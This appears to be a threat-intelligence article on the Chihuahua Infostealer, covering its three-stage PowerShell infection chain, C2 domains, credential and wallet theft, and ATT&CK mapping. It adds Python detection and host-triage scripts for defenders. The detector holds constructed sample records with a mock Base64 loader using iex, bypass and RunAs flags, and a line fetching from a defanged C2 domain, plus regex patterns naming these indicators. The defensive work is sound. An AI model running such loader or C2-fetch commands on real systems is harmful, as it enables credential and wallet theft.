A new .NET-based malware, dubbed Chihuahua Infostealer, has emerged as a significant threat to cybersecurity, targeting sensitive browser credentials and cryptocurrency wallet data.
Discovered in April 2025, this multi-stage malware employs obfuscated PowerShell scripts and trusted cloud platforms like Google Drive to deliver its payload, making it a formidable challenge for security teams.
Here’s a breakdown of its infection chain, tactics, and how organisations can defend against it.
Chihuahua Infostealer stands out for its refined approach, moving away from the “smash-and-grab” tactics of older malware.
Instead, it uses multi-stage loaders, cloud-hosted delivery, native API-based encryption, and meticulous cleanup routines to maintain persistence and evade detection.
Security researchers note that its design reflects a broader trend toward more resilient and feature-rich infostealers.
A unique quirk in the malware’s code is that it prints transliterated Russian rap lyrics to the console during execution, which hints at a possible Russian influence, though no specific threat actor has been conclusively identified.
These non-functional lyrics, such as “Edu iz Voronezha v Samaru v ‘Mak’ na Polevoj,” serve as a cultural signature, adding a layer of personality to the malicious code.
How Chihuahua Spreads
The infection begins with social engineering, tricking users into executing a malicious PowerShell script.
In one documented case, a Reddit user was lured into opening a seemingly legitimate Google Drive document, which triggered an obfuscated script.
Attackers abuse trusted platforms like Google Drive, OneDrive, and even GitHub to bypass URL and content filters and deliver payloads undetected.
Delivery methods include phishing emails, fake IT messages, and links shared via collaboration platforms.
The Infection Chain Unfolds in Three Stages:
Stage 1: Initial PowerShell Blob
A compact PowerShell one-liner decodes a Base64-encoded payload and executes it in memory, so the decoded stage is never written to disk where file-based antivirus scanning would see it. The script launches with `-ExecutionPolicy Bypass` and uses `Start-Process -Verb RunAs` to obtain elevated privileges; note that on a default-configured host the RunAs verb still raises a UAC consent prompt, so the elevation depends on the social-engineering pretext carrying the victim through that click.
Stage 2: Scheduled Job and Marker-Based Execution
The script rebuilds a heavily obfuscated payload, creates a scheduled job named f90g30g82 that runs every minute, and monitors the user’s Recent folder for .normaldaki marker files.
It communicates with a command-and-control (C2) server at cdn.findfakesnake[.]xyz or a fallback at cat-watches-site[.]xyz to fetch additional payloads.
Stage 3: Final Payload Execution
The malware downloads a .NET assembly from flowers.hold-me-finger[.]xyz and a Base64-encoded payload from OneDrive.
These are executed in memory using .NET reflection, followed by cleanup routines that clear the console, wipe clipboard contents, and erase local traces.
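The three stages above are easiest to catch in PowerShell script block logging (Event ID 4104), but only if the detection peels the Base64 layers the way the loader does, because the job name, marker extension and C2 domains sit inside the encoded blob, not in the outer one-liner. The following is an added example, not code from the article or from the malware: it unwraps `-EncodedCommand` (UTF-16LE) and quoted `FromBase64String` literals (assumed UTF-8) to a fixed depth, matches the article's indicators on every layer, and returns a verdict per record. The log records are constructed for illustration, the rule names and verdict thresholds are this example's own choices, and the technique tags follow the article's ATT&CK mapping.

```python
"""Detection logic for the three-stage PowerShell chain, run over constructed
script-block log records (shape of Event ID 4104 ScriptBlockText).
Added example, not the article's or the malware's code."""
import base64
import re
from typing import Optional

# Indicator rules: (name, ATT&CK technique from the article, regex).
RULES = [
    ("base64_inline_decode", "T1027", re.compile(r"FromBase64String\s*\(", re.I)),
    ("invoke_expression", "T1059.001", re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I)),
    ("execution_policy_bypass", "T1059.001", re.compile(r"-(?:ExecutionPolicy|ep)\s+Bypass", re.I)),
    ("runas_elevation", "T1059.001", re.compile(r"-Verb\s+RunAs", re.I)),
    ("scheduled_job_f90g30g82", "T1053.005", re.compile(r"\bf90g30g82\b", re.I)),
    ("normaldaki_marker", "T1053.005", re.compile(r"\.normaldaki\b", re.I)),
    ("known_c2_domain", "T1041",  # accepts defanged "[.]" as well as a live dot
     re.compile(r"(?:cdn\.findfakesnake|cat-watches-site|flowers\.hold-me-finger)(?:\.|\[\.\])xyz", re.I)),
    ("reflective_assembly_load", "T1059.001", re.compile(r"\[System\.Reflection\.Assembly\]::Load\w*\(", re.I)),
]
# Any one of these is specific enough to the article's sample to act on alone.
HARD_INDICATORS = {"scheduled_job_f90g30g82", "normaldaki_marker", "known_c2_domain"}

# -EncodedCommand and its short forms carry UTF-16LE; a quoted literal fed to
# FromBase64String is assumed (this example's choice) to be UTF-8 text.
ENC_FLAG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/]{32,}={0,2})", re.I)
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{32,}={0,2})['\"]")


def _try_decode(blob: str, encoding: str) -> Optional[str]:
    """Decode a Base64 blob as text; reject binary or malformed output."""
    try:
        text = base64.b64decode(blob, validate=True).decode(encoding)
    except (ValueError, UnicodeDecodeError):
        return None
    return text if all(c.isprintable() or c in "\r\n\t" for c in text) else None


def unwrap_layers(script: str, max_depth: int = 4) -> list:
    """Return the script plus every Base64 layer found inside it, decoded
    breadth-first, so rules match the text the loader would execute."""
    layers, frontier = [script], [script]
    for _ in range(max_depth):
        decoded = []
        for text in frontier:
            for m in ENC_FLAG.finditer(text):
                d = _try_decode(m.group(1), "utf-16-le")
                if d:
                    decoded.append(d)
            for m in B64_LITERAL.finditer(text):
                d = _try_decode(m.group(1), "utf-8")
                if d:
                    decoded.append(d)
        if not decoded:
            break
        layers += decoded
        frontier = decoded
    return layers


def scan_record(record: dict) -> list:
    """Every (rule, technique, layer index) hit for one log record."""
    hits = []
    for depth, layer in enumerate(unwrap_layers(record["ScriptBlockText"])):
        for name, technique, rx in RULES:
            if rx.search(layer):
                hits.append({"rule": name, "technique": technique, "layer": depth})
    return hits


def triage(records: list) -> dict:
    """Per record: distinct rules hit, deepest layer a hit came from, verdict.
    A lone generic hit (e.g. one iex) is too noisy, so 'suspicious' needs two
    distinct rules; any hard indicator is 'malicious' by itself."""
    out = {}
    for rec in records:
        hits = scan_record(rec)
        rules = sorted({h["rule"] for h in hits})
        if set(rules) & HARD_INDICATORS:
            verdict = "malicious"
        elif len(rules) >= 2:
            verdict = "suspicious"
        else:
            verdict = "benign"
        out[rec["RecordId"]] = {"verdict": verdict, "rules": rules,
                                "depth": max((h["layer"] for h in hits), default=0)}
    return out


# Constructed sample records modelled on the article's description (not real logs).
_STAGE2 = ("Register-ScheduledJob -Name f90g30g82 -ScriptBlock { "
           "Get-ChildItem \"$env:APPDATA\\Microsoft\\Windows\\Recent\" -Filter *.normaldaki | "
           "ForEach-Object { iwr https://cdn.findfakesnake[.]xyz/p } }")
_STAGE1 = ("iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
           + base64.b64encode(_STAGE2.encode()).decode() + "')))")
_ENC = base64.b64encode(_STAGE1.encode("utf-16-le")).decode()
SAMPLE_RECORDS = [
    {"RecordId": 1, "ScriptBlockText": "Get-ChildItem C:\\Users -Recurse | Measure-Object"},
    {"RecordId": 2, "ScriptBlockText": "Start-Process powershell -Verb RunAs "
                                       f"-ArgumentList '-ExecutionPolicy Bypass -enc {_ENC}'"},
    {"RecordId": 3, "ScriptBlockText": "$asm = [Convert]::FromBase64String($blob); "
                                       "[System.Reflection.Assembly]::Load($asm).EntryPoint.Invoke($null, @()); "
                                       "Clear-Host; Set-Clipboard -Value ''"},
]

if __name__ == "__main__":
    for rid, result in triage(SAMPLE_RECORDS).items():
        print(rid, result["verdict"], "depth", result["depth"], result["rules"])
```

Record 2 only reveals the job name, marker extension and C2 domain at decoding depth 2; a rule set that matches the outer ScriptBlockText alone would see nothing more specific than an execution-policy bypass. Real logs carry the C2 domains undefanged; the regex accepts both forms so the same rules can be tested against defanged threat-intel text.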
Data Theft and Evasion Tactics
According to the Picus Security report, Chihuahua targets a wide range of browsers, including Chrome, Chromium, Brave, Opera, Microsoft Edge, and others, extracting saved passwords, cookies, autofill data, session tokens, and browsing history.
It also hunts for cryptocurrency wallet data by targeting specific browser extension IDs, such as EVER Wallet, Rabby, and Clover Wallet.
To remain stealthy, the malware:
- Uses in-memory execution to avoid writing files to disk.
- Employs AES encryption to secure stolen data before exfiltration over HTTPS.
- Leverages legitimate system tools like PowerShell and the Windows Task Scheduler to blend in with normal activity.
- Deletes temporary files and artifacts to cover its tracks.
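The cleanup routine removes temporary files, but the persistence it relies on (the scheduled job named f90g30g82 and the .normaldaki marker files in the user's Recent folder) has to stay on disk to keep working, which makes those the artifacts to hunt for during triage. The following is an added example, not code from the article or from the malware. The artifact names come from the article; the on-disk locations are this example's assumptions, namely that the job was created with PowerShell's Register-ScheduledJob, whose definition is stored under %LOCALAPPDATA%\Microsoft\Windows\PowerShell\ScheduledJobs\<name>\ with a Task Scheduler entry under %SystemRoot%\System32\Tasks\Microsoft\Windows\PowerShell\ScheduledJobs\<name>. Both roots are parameters so the same function runs against a live profile, a mounted image, or the constructed directory tree used for the dry run.

```python
"""Host triage for the persistence artifacts the cleanup routine leaves behind.
Added example, not the article's or the malware's code; the artifact paths
are assumptions of this example (see the lead-in)."""
import tempfile
from pathlib import Path

JOB_NAME = "f90g30g82"          # scheduled job name from the article
MARKER_SUFFIX = ".normaldaki"   # marker file extension from the article


def find_artifacts(profile_root: Path, system_root: Path) -> dict:
    """Return matching paths found under the two roots plus an 'infected' flag."""
    recent = profile_root / "AppData" / "Roaming" / "Microsoft" / "Windows" / "Recent"
    ps_jobs = profile_root / "AppData" / "Local" / "Microsoft" / "Windows" / "PowerShell" / "ScheduledJobs"
    tasks = system_root / "System32" / "Tasks" / "Microsoft" / "Windows" / "PowerShell" / "ScheduledJobs"
    findings = {"markers": [], "job_definition": None, "task_entry": None}
    if recent.is_dir():
        # Marker files are matched by name, not Path.suffix, so a bare
        # ".normaldaki" file (suffix == "") is still caught.
        findings["markers"] = sorted(
            str(p) for p in recent.iterdir()
            if p.is_file() and p.name.lower().endswith(MARKER_SUFFIX))
    job_def = ps_jobs / JOB_NAME / "ScheduledJobDefinition.xml"
    if job_def.is_file():
        findings["job_definition"] = str(job_def)
    task = tasks / JOB_NAME
    if task.is_file():
        findings["task_entry"] = str(task)
    findings["infected"] = bool(findings["markers"] or findings["job_definition"] or findings["task_entry"])
    return findings


def build_demo_tree(base: Path, infected: bool):
    """Construct a profile/system layout for a dry run (constructed data)."""
    profile = base / "Users" / "victim"
    system = base / "Windows"
    recent = profile / "AppData" / "Roaming" / "Microsoft" / "Windows" / "Recent"
    recent.mkdir(parents=True)
    (recent / "report.docx.lnk").write_text("benign shortcut")
    task_dir = system / "System32" / "Tasks" / "Microsoft" / "Windows" / "PowerShell" / "ScheduledJobs"
    task_dir.mkdir(parents=True)
    if infected:
        (recent / "a1b2.normaldaki").write_text("")
        job_dir = profile / "AppData" / "Local" / "Microsoft" / "Windows" / "PowerShell" / "ScheduledJobs" / JOB_NAME
        job_dir.mkdir(parents=True)
        (job_dir / "ScheduledJobDefinition.xml").write_text("<Objs/>")
        (task_dir / JOB_NAME).write_text("<Task/>")
    return profile, system


def demo(infected: bool) -> dict:
    """Run find_artifacts against a constructed tree in a temporary directory."""
    with tempfile.TemporaryDirectory() as tmp:
        profile, system = build_demo_tree(Path(tmp), infected)
        return find_artifacts(profile, system)


if __name__ == "__main__":
    print("clean host:   ", demo(False))
    print("infected host:", demo(True))
```

On a live Windows host, point `find_artifacts` at `Path(os.environ["USERPROFILE"])` and `Path(os.environ["SystemRoot"])`; on a mounted image, at the equivalent directories under the mount point. A hit on the marker files alone is worth escalating even when the job definition is missing, since the article notes the job is the component that polls for them.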
Chihuahua Infostealer represents a new breed of stealthy, multi-stage malware that combines technical sophistication with cultural flair.
Its use of trusted platforms, in-memory execution, and encrypted exfiltration makes it a serious threat to both individuals and organizations.
By understanding its infection chain and monitoring the points where it is visible (PowerShell script block logging, scheduled job creation, the marker files in the Recent folder, and connections to the C2 domains listed above), security teams can detect this evolving threat before the final payload runs.
Chihuahua’s tactics align with several MITRE ATT&CK techniques:
- Initial Access (T1566.002): Spearphishing links via trusted cloud platforms.
- Execution (T1059.001): PowerShell-based payload execution.
- Persistence (T1053.005): Scheduled tasks for continuous operation.
- Defense Evasion (T1027, T1218): Obfuscated scripts and use of trusted utilities.
- Credential Access (T1555.003): Stealing browser credentials and crypto wallet data.
- Exfiltration (T1041): Encrypted data sent over HTTPS to C2 servers.